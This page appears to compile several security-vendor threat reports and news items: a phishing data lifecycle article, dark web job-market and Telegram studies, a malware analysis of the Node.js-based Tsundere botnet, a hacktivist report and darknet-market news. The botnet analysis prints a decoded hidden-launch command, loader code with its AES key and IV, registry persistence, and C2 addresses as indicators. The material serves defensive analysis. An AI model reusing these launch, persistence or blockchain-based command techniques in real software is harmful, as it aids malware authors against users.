Introduction

A typical phishing attack involves a user clicking a fraudulent link and entering their credentials on a scam website. However, the attack is far from over at that point. The moment the confidential information falls into the hands of cybercriminals, it immediately transforms into a commodity and enters the shadow market conveyor belt.

In this article, we trace the path of the stolen data, starting from its collection through various tools – such as Telegram bots and advanced administration panels – to the sale of that data and its subsequent reuse in new attacks. We examine how a once leaked username and password become part of a massive digital dossier and why cybercriminals can leverage even old leaks for targeted attacks, sometimes years after the initial data breach.

Data harvesting mechanisms in phishing attacks

Before we trace the subsequent fate of the stolen data, we need to understand exactly how it leaves the phishing page and reaches the cybercriminals.

By analyzing real-world phishing pages, we have identified the most common methods for data transmission:

• Send to an email address.
• Send to a Telegram bot.
• Upload to an administration panel.

It also bears mentioning that attackers may use legitimate services for data harvesting to make their server harder to detect. Examples include online form services like Google Forms, Microsoft Forms, etc. Stolen data repositories can also be set up on GitHub, Discord servers, and other websites. For the purposes of this analysis, however, we will focus on the primary methods of data harvesting.

Email

Data entered into an HTML form on a phishing page is sent to the cybercriminal’s server via a PHP script, which then forwards it to an email address controlled by the attacker. However, this method is becoming less common due to several limitations of email services, such as delivery delays, the risk of the hosting provider blocking the sending server, and the inconvenience of processing large volumes of data.

As an example, let’s look at a phishing kit targeting DHL users.

The index.php file contains the phishing form designed to harvest user data – in this case, an email address and a password.

The data that the victim enters into this form is then sent via a script in the next.php file to the email address specified within the mail.php file.

Telegram bots

Unlike the previous method, the script used to send stolen data specifies a Telegram API URL with a bot token and the corresponding Chat ID, rather than an email address. In some cases, the link is hard-coded directly into the phishing HTML form. Attackers create a detailed message template that is sent to the bot after a successful attack. Here is what this looks like in the code:

Compared to sending data via email, using Telegram bots provides phishers with enhanced functionality, which is why they are increasingly adopting this method. Data arrives in the bot in real time, with instant notification to the operator. Attackers often use disposable bots, which are harder to track and block. Furthermore, their performance does not depend on the quality of phishing page hosting.

Automated administration panels

More sophisticated cybercriminals use specialized software, including commercial frameworks like BulletProofLink and Caffeine, often as a Platform as a Service (PaaS). These frameworks provide a web interface (dashboard) for managing phishing campaigns.

Data harvested from all phishing pages controlled by the attacker is fed into a unified database that can be viewed and managed through their account.

These admin panels are used for analyzing and processing victim data. The features of a specific panel depend on the available customization options, but most dashboards typically have the following capabilities:

• Sorting of real-time statistics: the ability to view the number of successful attacks by time and country, along with data filtering options
• Automatic verification: some systems can automatically check the validity of the stolen data like credit cards and login credentials
• Data export: the ability to download the data in various formats for future use or sale

Admin panels are a vital tool for organized cybercriminals.

One campaign often employs several of these data harvesting methods simultaneously.

The data cybercriminals want

The data harvested during a phishing attack varies in value and purpose. In the hands of cybercriminals, it becomes a method of profit and a tool for complex, multi-stage attacks.

Stolen data can be divided into the following categories, based on its intended purpose:

• Immediate monetization: the direct sale of large volumes of raw data or the immediate withdrawal of funds from a victim’s bank account or online wallet.
  • Banking details: card number, expiration date, cardholder name, and CVV/CVC.
  • Access to online banking accounts and digital wallets: logins, passwords, and one-time 2FA codes.
  • Accounts with linked banking details: logins and passwords for accounts that contain bank card details, such as online stores, subscription services, or payment systems like Apple Pay or Google Pay.
• Subsequent attacks for further monetization: using the stolen data to conduct new attacks and generate further profit.
  • Credentials for various online accounts: logins and passwords. Importantly, email addresses or phone numbers, which are often used as logins, can hold value for attackers even without the accompanying passwords.
  • Phone numbers, used for phone scams, including attempts to obtain 2FA codes, and for phishing via messaging apps.
  • Personal data: full name, date of birth, and address, abused in social engineering attacks
• Targeted attacks, blackmail, identity theft, and deepfakes.
  • Biometric data: voice and facial projections.
  • Scans and numbers of personal documents: passports, driver’s licenses, social security cards, and taxpayer IDs.
  • Selfies with documents, used for online loan applications and identity verification.
  • Corporate accounts, used for targeted attacks on businesses.

We analyzed phishing and scam attacks conducted from January through September 2025 to determine which data was most frequently targeted by cybercriminals. We found that 88.5% of attacks aimed to steal credentials for various online accounts, 9.5% targeted personal data (name, address, and date of birth), and 2% focused on stealing bank card details.

Distribution of attacks by target data type, January–September 2025 (download)

Selling data on dark web markets

Except for real-time attacks or those aimed at immediate monetization, stolen data is typically not used instantly. Let’s take a closer look at the route it takes.

1. Sale of data dumps
   Data is consolidated and put up for sale on dark web markets in the form of dumps: archives that contain millions of records obtained from various phishing attacks and data breaches. A dump can be offered for as little as $50. The primary buyers are often not active scammers but rather dark market analysts, the next link in the supply chain.
2. Sorting and verification
   Dark market analysts filter the data by type (email accounts, phone numbers, banking details, etc.) and then run automated scripts to verify it. This checks validity and reuse potential, for example, whether a Facebook login and password can be used to sign in to Steam or Gmail. Data stolen from one service several years ago can still be relevant for another service today because people tend to use identical passwords across multiple websites. Verified accounts with an active login and password command a higher price at the point of sale.
   Analysts also focus on combining user data from different attacks. Thus, an old password from a compromised social media site, a login and password from a phishing form mimicking an e-government portal, and a phone number left on a scam site can all be compiled into a single digital dossier on a specific user.
3. Selling on specialized markets
   Stolen data is typically sold on dark web forums and via Telegram. The instant messaging app is often used as a storefront to display prices, buyer reviews, and other details.
   

   Offers of social media data, as displayed in Telegram

   The prices of accounts can vary significantly and depend on many factors, such as account age, balance, linked payment methods (bank cards, online wallets), 2FA authentication, and service popularity. Thus, an online store account may be more expensive if it is linked to an email, has 2FA enabled, and has a long history, with a large number of completed orders. For gaming accounts, such as Steam, expensive game purchases are a factor. Online banking data sells at a premium if the victim has a high account balance and the bank itself has a good reputation.

   The table below shows prices for various types of accounts found on dark web forums as of 2025*.

   Category	Price	Average price
   Crypto platforms	$60–$400	$105
   Banks	$70–$2000	$350
   E-government portals	$15–$2000	$82.5
   Social media	$0.4–$279	$3
   Messaging apps	$0.065–$150	$2.5
   Online stores	$10–$50	$20
   Games and gaming platforms	$1–$50	$6
   Global internet portals	$0.2–$2	$0.9
   Personal documents	$0.5–$125	$15

   *Data provided by Kaspersky Digital Footprint Intelligence

4. High-value target selection and targeted attacks
   Cybercriminals take particular interest in valuable targets. These are users who have access to important information: senior executives, accountants, or IT systems administrators.

   Let’s break down a possible scenario for a targeted whaling attack. A breach at Company A exposes data associated with a user who was once employed there but now holds an executive position at Company B. The attackers analyze open-source intelligence (OSINT) to determine the user’s current employer (Company B). Next, they craft a sophisticated phishing email to the target, purportedly from the CEO of Company B. To build trust, the email references some facts from the target’s old job – though other scenarios exist too. By disarming the user’s vigilance, cybercriminals gain the ability to compromise Company B for a further attack.

   Importantly, these targeted attacks are not limited to the corporate sector. Attackers may also be drawn to an individual with a large bank account balance or someone who possesses important personal documents, such as those required for a microloan application.

Takeaways

The journey of stolen data is like a well-oiled conveyor belt, where every piece of information becomes a commodity with a specific price tag. Today, phishing attacks leverage diverse systems for harvesting and analyzing confidential information. Data flows instantly into Telegram bots and attackers’ administration panels, where it is then sorted, verified, and monetized.

It is crucial to understand that data, once lost, does not simply vanish. It is accumulated, consolidated, and can be used against the victim months or even years later, transforming into a tool for targeted attacks, blackmail, or identity theft. In the modern cyber-environment, caution, the use of unique passwords, multi-factor authentication, and regular monitoring of your digital footprint are no longer just recommendations – they are a necessity.

What to do if you become a victim of phishing

1. If a bank card you hold has been compromised, call your bank as soon as possible and have the card blocked.
2. If your credentials have been stolen, immediately change the password for the compromised account and any online services where you may have used the same or a similar password. Set a unique password for every account.
3. Enable multi-factor authentication in all accounts that support this.
4. Check the sign-in history for your accounts and terminate any suspicious sessions.
5. If your messaging service or social media account has been compromised, alert your family and friends about potential fraudulent messages sent in your name.
6. Use specialized services to check if your data has been found in known data breaches.
7. Treat any unexpected emails, calls, or offers with extreme vigilance – they may appear credible because attackers are using your compromised data.

Telegram has won over users worldwide, and cybercriminals are no exception. While the average user chooses a messaging app based on convenience, user experience and stability (and perhaps, cool stickers), cybercriminals evaluate platforms through a different lens.

When it comes to anonymity, privacy and application independence – essential criteria for a shadow messaging app – Telegram is not as strong as its direct competitors.

• It lacks default end-to-end (E2E) encryption for chats.
• It has a centralized infrastructure: users cannot set up their own servers for communication.
• Its server-side code is closed: users cannot verify what it does.

This architecture requires a high degree of trust in the platform, but experienced cybercriminals prefer not to rely on third parties when it comes to protecting their operations and, more importantly, their personal safety.

That said, Telegram today is widely viewed and used not only as a communication tool (messaging service), but also as a full-fledged dark-market business platform – thanks to several features that underground communities actively exploit.

Is this research, we examine Telegram through the eyes of cybercriminals, evaluate its technical capabilities for running underground operations, and analyze the lifecycle of a Telegram channel from creation to digital death. For this purpose, we analyzed more than 800 blocked Telegram channels, which existed between 2021 and 2024.

Key findings

• The median lifespan of a shadow Telegram channel increased from five months in 2021–2022 to nine months in 2023–2024.
• The frequency of blocking cybercrime channels has been growing since October 2024.
• Cybercriminals have been migrating to other messaging services due to frequent blocks by Telegram.

You can find the full report on the Kaspersky Digital Footprint Intelligence website.

In 2022, we published our research examining how IT specialists look for work on the dark web. Since then, the job market has shifted, along with the expectations and requirements placed on professionals. However, recruitment and headhunting on the dark web remain active.

So, what does this job market look like today? This report examines how employment and recruitment function on the dark web, drawing on 2,225 job-related posts collected from shadow forums between January 2023 and June 2025. Our analysis shows that the dark web continues to serve as a parallel labor market with its own norms, recruitment practices and salary expectations, while also reflecting broader global economic shifts. Notably, job seekers increasingly describe prior work experience within the shadow economy, suggesting that for many, this environment is familiar and long-standing.

The majority of job seekers do not specify a professional field, with 69% expressing willingness to take any available work. At the same time, a wide range of roles are represented, particularly in IT. Developers, penetration testers and money launderers remain the most in-demand specialists, with reverse engineers commanding the highest average salaries. We also observe a significant presence of teenagers in the market, many seeking small, fast earnings and often already familiar with fraudulent schemes.

While the shadow market contrasts with legal employment in areas such as contract formality and hiring speed, there are clear parallels between the two. Both markets increasingly prioritize practical skills over formal education, conduct background checks and show synchronized fluctuations in supply and demand.

Looking ahead, we expect the average age and qualifications of dark web job seekers to rise, driven in part by global layoffs. Ultimately, the dark web job market is not isolated — it evolves alongside the legitimate labor market, influenced by the same global economic forces.

In this report, you’ll find:

• Demographics of the dark web job seekers
• Their job preferences
• Top specializations on the dark web
• Job salaries
• Comparison between legal and shadow job markets

Get the report

Introduction

Tsundere is a new botnet, discovered by our Kaspersky GReAT around mid-2025. We have correlated this threat with previous reports from October 2024 that reveal code similarities, as well as the use of the same C2 retrieval method and wallet. In that instance, the threat actor created malicious Node.js packages and used the Node Package Manager (npm) to deliver the payload. The packages were named similarly to popular packages, employing a technique known as typosquatting. The threat actor targeted libraries such as Puppeteer, Bignum.js, and various cryptocurrency packages, resulting in 287 identified malware packages. This supply chain attack affected Windows, Linux, and macOS users, but it was short-lived, as the packages were removed and the threat actor abandoned this infection method after being detected.

The threat actor resurfaced around July 2025 with a new threat. We have dubbed it the Tsundere bot after its C2 panel. This botnet is currently expanding and poses an active threat to Windows users.

Initial infection

Currently, there is no conclusive evidence on how the Tsundere bot implants are being spread. However, in one documented case, the implant was installed via a Remote Monitoring and Management (RMM) tool, which downloaded a file named pdf.msi from a compromised website. In other instances, the sample names suggest that the implants are being disseminated using the lure of popular Windows games, particularly first-person shooters. The samples found in the wild have names such as “valorant”, “cs2”, or “r6x”, which appear to be attempts to capitalize on the popularity of these games among piracy communities.

Malware implants

According to the C2 panel, there are two distinct formats for spreading the implant: via an MSI installer and via a PowerShell script. Implants are automatically generated by the C2 panel (as described in the Infrastructure section).

MSI installer

The MSI installer was often disguised as a fake installer for popular games and other software to lure new victims. Notably, at the time of our research, it had a very low detection rate.

The installer contains a list of data and JavaScript files that are updated with each new build, as well as the necessary Node.js executables to run these scripts. The following is a list of files included in the sample:

nodejs/B4jHWzJnlABB2B7
nodejs/UYE20NBBzyFhqAQ.js
nodejs/79juqlY2mETeQOc
nodejs/thoJahgqObmWWA2
nodejs/node.exe
nodejs/npm.cmd
nodejs/npx.cmd

The last three files in the list are legitimate Node.js files. They are installed alongside the malicious artifacts in the user’s AppData\Local\nodejs directory.

An examination of the CustomAction table reveals the process by which Windows Installer executes the malware and installs the Tsundere bot:

RunModulesSetup 1058    NodeDir powershell -WindowStyle Hidden -NoLogo -enc JABuAG[...]ACkAOwAiAA==

After Base64 decoding, the command appears as follows:

$nodePath = "$env:LOCALAPPDATA\nodejs\node.exe";
& $nodePath  - e "const { spawn } = require('child_process'); spawn(process.env.LOCALAPPDATA + '\\nodejs\\node.exe', ['B4jHWzJnlABB2B7'], { detached: true, stdio: 'ignore', windowsHide: true, cwd: __dirname }).unref();"

This will execute Node.js code that spawns a new Node.js process, which runs the loader JavaScript code (in this case, B4jHWzJnlABB2B7). The resulting child process runs in the background, remaining hidden from the user.

Loader script

The loader script is responsible for ensuring the correct decryption and execution of the main bot script, which handles npm unpackaging and configuration. Although the loader code, similar to the code for the other JavaScript files, is obfuscated, it can be deobfuscated using open-source tools. Once executed, the loader attempts to locate the unpackaging script and configuration for the Tsundere bot, decrypts them using the AES-256 CBC cryptographic algorithm with a build-specific key and IV, and saves the decrypted files under different filenames.

encScriptPath = 'thoJahgqObmWWA2',
  encConfigPath = '79juqlY2mETeQOc',
  decScript = 'uB39hFJ6YS8L2Fd',
  decConfig = '9s9IxB5AbDj4Pmw',
  keyBase64 = '2l+jfiPEJufKA1bmMTesfxcBmQwFmmamIGM0b4YfkPQ=',
  ivBase64 = 'NxrqwWI+zQB+XL4+I/042A==',
[...]
    const h = path.dirname(encScriptPath),
      i = path.join(h, decScript),
      j = path.join(h, decConfig)
    decryptFile(encScriptPath, i, key, iv)
    decryptFile(encConfigPath, j, key, iv)

The configuration file is a JSON that defines a directory and file structure, as well as file contents, which the malware will recreate. The malware author refers to this file as “config”, but its primary purpose is to package and deploy the Node.js package manager (npm) without requiring manual installation or downloading. The unpackaging script is responsible for recreating this structure, including the node_modules directory with all its libraries, which contains packages necessary for the malware to run.

With the environment now set up, the malware proceeds to install three packages to the node_modules directory using npm:

• ws: a WebSocket networking library
• ethers: a library for communicating with Ethereum
• pm2: a Node.js process management tool

The pm2 package is installed to ensure the Tsundere bot remains active and used to launch the bot. Additionally, pm2 helps achieve persistence on the system by writing to the registry and configuring itself to restart the process upon login.

PowerShell infector

The PowerShell version of the infector operates in a more compact and simplified manner. Instead of utilizing a configuration file and an unpacker — as done with the MSI installer — it downloads the ZIP file node-v18.17.0-win-x64.zip from the official Node.js website nodejs[.]org and extracts it to the AppData\Local\NodeJS directory, ultimately deploying Node.js on the targeted device. The infector then uses the AES-256-CBC algorithm to decrypt two large hexadecimal-encoded variables, which correspond to the bot script and a persistence script. These decrypted files, along with a package.json file are written to the disk. The package.json file contains information about the malicious Node.js package, as well as the necessary libraries to be installed, including the ws and ethers packages. Finally, the infector runs both scripts, starting with the persistence script that is followed by the bot script.

Persistence is achieved through the same mechanism observed in the MSI installer: the script creates a value in the HKCU:\Software\Microsoft\Windows\CurrentVersion\Run registry key that points to itself. It then overwrites itself with a new script that is Base64 decoded. This new script is responsible for ensuring the bot is executed on each login by spawning a new instance of the bot.

Tsundere bot

We will now delve into the Tsundere bot, examining its communication with the command-and-control (C2) server and its primary functionality.

C2 address retrieval

Web3 contracts, also known as smart contracts, are deployed on a blockchain via transactions from a wallet. These contracts can store data in variables, which can be modified by functions defined within the contract. In this case, the Tsundere botnet utilizes the Ethereum blockchain, where a method named setString(string _str) is defined to modify the state variable param1, allowing it to store a string. The string stored in param1 is used by the Tsundere botnet administrators to store new WebSocket C2 servers, which can be rotated at will and are immutable once written to the Ethereum blockchain.

The Tsundere botnet relies on two constant points of reference on the Ethereum blockchain:

• Wallet: 0x73625B6cdFECC81A4899D221C732E1f73e504a32
• Contract: 0xa1b40044EBc2794f207D45143Bd82a1B86156c6b

In order to change the C2 server, the Tsundere botnet makes a transaction to update the state variable with a new address. Below is a transaction made on August 19, 2025, with a value of 0 ETH, which updates the address.

The state variable has a fixed length of 32 bytes, and a string of 24 bytes (see item [2] in the previous image) is stored within it. When this string is converted from hexadecimal to ASCII, it reveals the new WebSocket C2 server address: ws[:]//185.28.119[.]179:1234.

To obtain the C2 address, the bot contacts various public endpoints that provide remote procedure call (RPC) APIs, allowing them to interact with Ethereum blockchain nodes. At the start of the script, the bot calls a function named fetchAndUpdateIP, which iterates through a list of RPC providers. For each provider, it checks the transactions associated with the contract address and wallet owner, and then retrieves the string from the state variable containing the WebSocket address, as previously observed.

The Tsundere bot verifies that the C2 address starts with either ws:// or wss:// to ensure it is a valid WebSocket URL, and then sets the obtained string as the server URL. But before using this new URL, the bot first checks the system locale by retrieving the culture name of the machine to avoid infecting systems in the CIS region. If the system is not in the CIS region, the bot establishes a connection to the server via a WebSocket, setting up the necessary handlers for receiving, sending, and managing connection states, such as errors and closed sockets.

Communication

The communication flow between the client (Tsundere bot) and the server (WebSocket C2) is as follows:

1. The Tsundere bot establishes a WebSocket connection with the retrieved C2 address.
2. An AES key is transmitted immediately after the connection is established.
3. The bot sends an empty string to confirm receipt of the key.
4. The server then sends an IV, enabling the use of encrypted communication from that point on.
   Encryption is required for all subsequent communication.
5. The bot transmits the OS information of the infected machine, including the MAC address, total memory, GPU information, and other details. This information is also used to generate a unique identifier (UUID).
6. The C2 server responds with a JSON object, acknowledging the connection and confirming the bot’s presence.
7. With the connection established, the client and server can exchange information freely.
   1. To maintain the connection, keep-alive messages are sent every minute using ping/pong messages.
   2. The bot sends encrypted responses as part of the ping/pong messages, ensuring continuous communication.

The connections are not authenticated through any additional means, making it possible for a fake client to establish a connection.

As previously mentioned, the client sends an encrypted ping message to the C2 server every minute, which returns a pong message. This ping-pong exchange serves as a mechanism for the C2 panel to maintain a list of currently active bots.

Functionality

The Tsundere bot is designed to allow the C2 server to send dynamic JavaScript code. When the C2 server sends a message with ID=1 to the bot, the message is evaluated as a new function and then executed. The result of this operation is sent back to the server via a custom function named serverSend, which is responsible for transmitting the result as a JSON object, encrypted for secure communication.

The ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and dynamism, allowing the botnet administrators to adapt it to a wide range of actions.

However, during our observation period, we did not receive any commands or functions from the C2 server, possibly because the newly connected bot needed to be requested by other threat actors through the botnet panel before it could be utilized.

Infrastructure

The Tsundere bot utilizes WebSocket as its primary protocol for establishing connections with the C2 server. As mentioned earlier, at the time of writing, the malware was communicating with the WebSocket server located at 185.28.119[.]179, and our tests indicated that it was responding positively to bot connections.

The following table lists the IP addresses and ports extracted from the provided list of URLs:

IP	Port	First seen (contract update)	ASN
185.28.119[.]179	1234	2025-08-19	AS62005
196.251.72[.]192	1234	2025-08-03	AS401120
103.246.145[.]201	1234	2025-07-14	AS211381
193.24.123[.]68	3011	2025-06-21	AS200593
62.60.226[.]179	3001	2025-05-04	AS214351

Marketplace and control panel

No business is complete without a marketplace, and similarly, no botnet is complete without a control panel. The Tsundere botnet has both a marketplace and a control panel, which are integrated into the same frontend.

The notable aspect of Tsundere’s control panel, dubbed “Tsundere Netto” (version 2.4.4), is that it has an open registration system. Any user who accesses the login form can register and gain access to the panel, which features various tabs:

• Bots: a dashboard displaying the number of bots under the user’s control
• Settings: user settings and administrative functions
• Build: if the user has an active license, they can create new bots using the two previously mentioned methodologies (MSI or PowerShell)
• Market: this is the most interesting aspect of the panel, as it allows users to promote their individual bots and offer various services and functionalities to other threat actors. Each build can create a bot that performs a specific set of actions, which can then be offered to others
• Monero wallet: a wallet service that enables users to make deposits or withdrawals
• Socks proxy: a feature that allows users to utilize their bots as proxies for their traffic

Each build generates a unique build ID, which is embedded in the implant and sent to the C2 server upon infection. This build ID can be linked to the user who created it. According to our research and analysis of other URLs found in the wild, builds are created through the panel and can be downloaded via the URL:

hxxps://idk.1f2e[REDACTED]07a4[.]net/api/builds/{BUILD-ID}.msi.

At the time of writing this, the panel typically has between 90 and 115 bots connected to the C2 server at any given time.

Attribution

Based on the text found in the implants, we can conclude with high confidence that the threat actor behind the Tsundere botnet is likely Russian-speaking. The use of the Russian language in the implants is consistent with previous attacks attributed to the same threat actor.

Furthermore, our analysis suggests a connection between the Tsundere botnet and the 123 Stealer, a C++-based stealer available on the shadow market for $120 per month. This connection is based on the fact that both panels share the same server. Notably, the main domain serves as the frontend for the 123 Stealer panel, while the subdomain “idk.” is used for the Tsundere botnet panel.

By examining the available evidence, we can link both threats to a Russian-speaking threat actor known as “koneko”. Koneko was previously active on a dark web forum, where they promoted the 123 Stealer, as well as other malware, including a backdoor. Although our analysis of the backdoor revealed that it was not directly related to Tsundere, it shared similarities with the Tsundere botnet in that it was written in Node.js and used PowerShell or MSI as infectors. Before the dark web forum was seized and shut down, koneko’s profile featured the title “node malware senior”, further suggesting their expertise in Node.js-based malware.

Conclusion

The Tsundere botnet represents a renewed effort by a presumably identified threat actor to revamp their toolset. The Node.js-based bot is an evolution of an attack discovered in October of last year, and it now features a new strategy and even a new business model. Infections can occur through MSI and PowerShell files, which provides flexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack mechanisms, making it an even more formidable threat.

Additionally, the botnet leverages a technique that is gaining popularity: utilizing web3 contracts, also known as “smart contracts”, to host command-and-control (C2) addresses, which enhances the resilience of the botnet infrastructure. The botnet’s possible author, koneko, is also involved in peddling other threats, such as the 123 Stealer, which suggests that the threat is likely to escalate rather than diminish in the coming months. As a result, it is essential to closely monitor this threat and be vigilant for related threats that may emerge in the near future.

Indicators of compromise

More IoCs related to this threat are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

File hashes
235A93C7A4B79135E4D3C220F9313421
760B026EDFE2546798CDC136D0A33834
7E70530BE2BFFCFADEC74DE6DC282357
5CC5381A1B4AC275D221ECC57B85F7C3
AD885646DAEE05159902F32499713008
A7ED440BB7114FAD21ABFA2D4E3790A0
7CF2FD60B6368FBAC5517787AB798EA2
E64527A9FF2CAF0C2D90E2238262B59A
31231FD3F3A88A27B37EC9A23E92EBBC
FFBDE4340FC156089F968A3BD5AA7A57
E7AF0705BA1EE2B6FBF5E619C3B2747E
BFD7642671A5788722D74D62D8647DF9
8D504BA5A434F392CC05EBE0ED42B586
87CE512032A5D1422399566ECE5E24CF
B06845C9586DCC27EDBE387EAAE8853F
DB06453806DACAFDC7135F3B0DEA4A8F

File paths
%APPDATA%\Local\NodeJS

Domains and IPs
ws://185.28.119[.]179:1234
ws://196.251.72[.]192:1234
ws://103.246.145[.]201:1234
ws://193.24.123[.]68:3011
ws://62.60.226[.]179:3001

Cryptocurrency wallets
Note: These are wallets that have changed the C2 address in the smart contract since it was created.
0x73625B6cdFECC81A4899D221C732E1f73e504a32
0x10ca9bE67D03917e9938a7c28601663B191E4413
0xEc99D2C797Db6E0eBD664128EfED9265fBE54579
0xf11Cb0578EA61e2EDB8a4a12c02E3eF26E80fc36
0xdb8e8B0ef3ea1105A6D84b27Fc0bAA9845C66FD7
0x10ca9bE67D03917e9938a7c28601663B191E4413
0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84
0x46b0f9bA6F1fb89eb80347c92c9e91BDF1b9E8CC

What do hacktivist campaigns look like in 2025? To answer this question, we analyzed more than 11,000 posts produced by over 120 hacktivist groups circulating across both the surface web and the dark web, with a particular focus on groups targeting MENA countries. The primary goal of our research is to highlight patterns in hacktivist operations, including attack methods, public warnings, and stated intent. The analysis is undertaken exclusively from a cybersecurity perspective and anchored in the principle of neutrality.

Hacktivists are politically motivated threat actors who typically value visibility over sophistication. Their tactics are designed for maximum visibility, reach, and ease of execution, rather than stealth or technical complexity. The term “hacktivist” may refer to either the administrator of a community who initiates the attack or an ordinary subscriber who simply participates in the campaign.

Key findings

While it may be assumed that most operations unfold on hidden forums, in fact, most hacktivist planning and mobilization happens in the open. Telegram has become the command center for today’s hacktivist groups, hosting the highest density of attack planning and calls to action. The second place is occupied by X (ex-Twitter).

Although we focused on hacktivists operating in MENA, the targeting of the groups under review is global, extending well beyond the region. There are victims throughout Europe and Middle East, as well as Argentina, the United States, Indonesia, India, Vietnam, Thailand, Cambodia, Türkiye, and others.

Hashtags as the connective tissue of hacktivist operations

One notable feature of hacktivist posts and messages on dark web sites is the frequent use of hashtags (#words). Used in their posts constantly, hashtags often serve as political slogans, amplifying messages, coordinating activity or claiming credit for attacks. The most common themes are political statements and hacktivist groups names, though hashtags sometimes reference geographical locations, such as specific countries or cities.

Hashtags also map alliances and momentum. We have identified 2063 unique tags in 2025: 1484 appearing for the first time, and many tied directly to specific groups or joint campaigns. Most tags are short-lived, lasting about two months, with “popular” ones persisting longer when amplified by alliances; channel bans contribute to attrition.

Operationally, reports of completed attacks dominate hashtagged content (58%), and within those, DDoS is the workhorse (61%). Spikes in threatening rhetoric do not by themselves predict more attacks, but timing matters: when threats are published, they typically refer to actions in the near term, i.e. the same week or month, making early warning from open-channel monitoring materially useful.

The full version of the report details the following findings:

• How long it typically takes for an attack to be reported after an initial threat post
• How hashtags are used to coordinate attacks or claim credit
• Patterns across campaigns and regions
• The types of cyberattacks being promoted or celebrated

Practical takeaways and recommendations

For defenders and corporate leaders, we recommend the following:

• Prioritize scalable DDoS mitigation and proactive security measures.
• Treat public threats as short-horizon indicators rather than long-range forecasts.
• Invest in continuous monitoring across Telegram and related ecosystems to discover alliance announcements, threat posts, and cross-posted “proof” rapidly.

Even organizations outside geopolitical conflict zones should assume exposure: hacktivist campaigns seek reach and spectacle, not narrow geography, and hashtags remain a practical lens for separating noise from signals that demand action.

To download the full report, please fill in the form below.

Abacus Market, the largest bitcoin-enabled Western darknet marketplace, went offline earlier this month, leading blockchain intelligence firm TRM Labs to assess that the operators likely executed an exit scam, disappearing with users’ funds. This incident follows the June 16 seizure of Archetyp Market by law enforcement, highlighting a trend of instability within the Western darknet […]

An international law enforcement operation in June 2025 dismantled Archetyp, one of the dark web’s largest drug marketplaces, after a three-day crackdown spanning six countries. Police Seize €7.8M in Assets in Archetyp Dark Web Bust Archetyp, a darknet platform that reportedly facilitated more than €250 million ($289 million) in illicit drug sales, was taken offline […]

Dormant cryptocurrency wallets associated with Nucleus Marketplace, a dark web market inactive since 2016, unexpectedly showed transaction activity on March 7, 2025, reigniting speculation about the fate of 5,000 bitcoin ( BTC) tied to the platform, according to data from blockchain analytics firm Arkham Intelligence. Dormant Bitcoin Wallets Linked to Defunct Dark Web Market Nucleus […]

A landmark sentencing has closed the chapter on Bitcoin Fog, the longest-running bitcoin mixing service on the darknet, with its operator facing over a decade in prison. The Fall of Bitcoin Fog: DOJ’s Pursuit Unmasks a Decade-Long Darknet Operation The U.S. Department of Justice (DOJ) announced Friday that Roman Sterlingov has been sentenced to prison […]

Heather Morgan, known by her rap persona “Razzlekhan,” could land an 18-month prison sentence after pleading guilty to laundering cryptocurrency linked to the 2016 Bitfinex hack. Prosecutors described her role as pivotal in obscuring stolen bitcoin through complex schemes, despite not being part of the original theft. Her cooperation, and the influence of her husband, […]

Two Russian nationals have been charged with running a massive money laundering network that processed billions through cryptocurrency exchanges, the U.S. Department of Justice (DOJ) announced. These exchanges, including Cryptex and Joker’s Stash, enabled criminals to bypass regulations and funnel funds from fraud, ransomware, and darknet activities. U.S. authorities, in collaboration with international law enforcement, […]

A Nigerian national has been sentenced to five years in federal prison for his role in a massive darknet fraud scheme that intended to cause over $6 million in losses, according to the U.S. Department of Justice (DOJ). Using various online aliases, Kaura led a global network selling stolen payment card data, using cryptocurrencies like […]

German authorities have dismantled 47 exchange services involved in facilitating anonymous crypto transactions for criminal activities. These platforms bypassed anti-money laundering protocols, enabling cybercriminals to exchange digital currencies without identity verification. The takedown follows a series of other operations targeting major cybercrime networks. With seized user and transaction data, authorities are set to pursue further […]

Irish authorities seized $7.1 million in cryptocurrency in a raid targeting money laundering and darknet sales. Three individuals were arrested, with one remaining in custody. “The arrests of the three individuals and the assets seized are the result of a highly complex investigation into criminal darknet marketplace activities by specialist investigators attached to the Garda […]

According to the U.S. Department of Justice (DOJ), the operator of the darknet marketplace Incognito was apprehended at John F. Kennedy Airport on May 18. Law enforcement officials claim Rui-Siang Lin allegedly constructed the DNM and facilitated the sale of over $100 million worth of illegal drugs through the platform. Federal Authorities Nab Alleged Darknet […]

The Internal Revenue Service (IRS) plans to send four agents who specialize in investigating cybercrime to Australia, Singapore, Colombia, and Germany starting this summer. These four new positions represent a significant increase in the IRS’s global efforts to fight cybercrimes, such as those involving cryptocurrency, decentralized finance and crypto laundering services. In the last several […]

Russian crypto traders have been looking to obtain unrestricted accounts for global exchanges as their access to such platforms is limited. Over the past year, the offering of such accounts on the dark web has increased significantly, cybersecurity experts told the Russian press.

Supply of Crypto Exchange Accounts for Russian Users Doubles in a Year of Sanctions

More and more ready-to-use accounts for cryptocurrency exchanges are being sold to Russian residents. While this is not a new phenomenon — such accounts are often employed by fraudsters and money launderers — the current growth in supply has been attributed to the restrictions imposed by the trading platforms on customers from Russia, as a result of compliance with sanctions over the war in Ukraine.

Russian residents have been buying these accounts despite the dangers, including the risk that whoever created them could maintain access after the sale, the Kommersant reported. But they are inexpensive and offers on darknet markets have doubled since early 2022, Nikolay Chursin from the Positive Technologies information security threat analysis group told the business daily.

According to Peter Mareichev, an analyst at Kaspersky Digital Footprint Intelligence, the number of new ads for ready-made and verified wallets on various exchanges reached 400 in December. Proposals to prepare fake documents for passing know-your-customer procedures also rose, the newspaper revealed in an earlier article last month.

Simple login data, username and password, is typically priced at around $50, Chursin added. And for a fully set up account, including the documents with which it was registered, a buyer would have to pay an average of $300. Dmitry Bogachev from digital threat analysis firm Jet Infosystems explained that the price depends on factors such as the country and date of registration as well as the activity history. Older accounts are more expensive.

Sergey Mendeleev, CEO of defi banking platform Indefibank, pointed out that there are two categories of buyers — Russians that have no other choice as they need an account for everyday work and those who use these accounts for criminal purposes. Igor Sergienko, director of development at cybersecurity services provider RTK-Solar, is convinced that demand is largely due to crypto exchanges blocking Russian accounts or withdrawals to Russian bank cards in recent months.

Major crypto service providers, including leading digital asset exchanges, have complied with financial restrictions introduced by the West in response to Russia’s invasion of Ukraine. Last year, the world’s largest crypto trading platform, Binance, indicated that, while restricting sanctioned individuals and entities, it was not banning all Russians.

